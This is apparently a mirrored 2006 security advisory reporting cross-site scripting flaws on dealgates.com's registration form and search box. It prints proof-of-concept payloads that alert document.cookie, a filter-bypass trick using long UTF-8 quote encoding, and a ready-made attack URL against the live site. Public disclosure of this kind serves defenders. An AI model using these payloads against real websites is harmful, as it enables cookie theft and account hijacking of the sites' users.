Lucene search

dealgates.txt

🗓️ 26 Jun 2006 00:00:00Reported by LunyType

packetstorm🔗 packetstormsecurity.com👁 22 Views

XSS vuln on dealgates.com, impacting account registration and search box. Cookie disclosure risk. Long UTF-8 unicode used to bypass backslashes. Screenshots at youfucktard.com/xsp/dealgates1.jpg, dealgates2.jpg, dealgates3.jp

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`Dealgates.com  
  
Homepage:  
http://www.dealgates.com  
  
Affected files:  
  
*Input boxes when registering new account  
  
* Search box  
-------------------------------------  
  
XSS vuln with cookie disclosure when registering a new account.  
  
  
To bypass the adding backslashes to ; and ", we use the long UTF-8 unicode of '. PoC:  
  
In the input boxes of "Your name:" and "Address".  
  
<IMG SRC=javascript:alert(&#0000039XSS&#0000039)>  
  
For the cookie:  
  
<IMG SRC=javascript:alert(document.cookie)>  
  
-----------------------------------  
  
XSS vuln with cookie disclosure via search input box. For a PoC put:  
  
">">">">">'>'>">"><<IMG SRC=javascript:alert(document.cookie)><"<"<"<"<'<'<"<"  
  
URL:  
https://www.dealgates.com/search.php?dealquery=%22%3E%22%3E%22%3E%22%3E%22%3E%27%3E%27%3E%22%3E%3CIMG+SRC%3Djavascript%3Aalert%28document.cookie%29%3E%3C%22%3C%27%3C%27%3C%27%3C%27%3C%27%3C%22&search_type=2  
  
  
Screenshots:  
http://www.youfucktard.com/xsp/dealgates1.jpg  
http://www.youfucktard.com/xsp/dealgates2.jpg  
http://www.youfucktard.com/xsp/dealgates3.jpg  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

26 Jun 2006 00:00Current

7.4High risk

Vulners AI Score7.4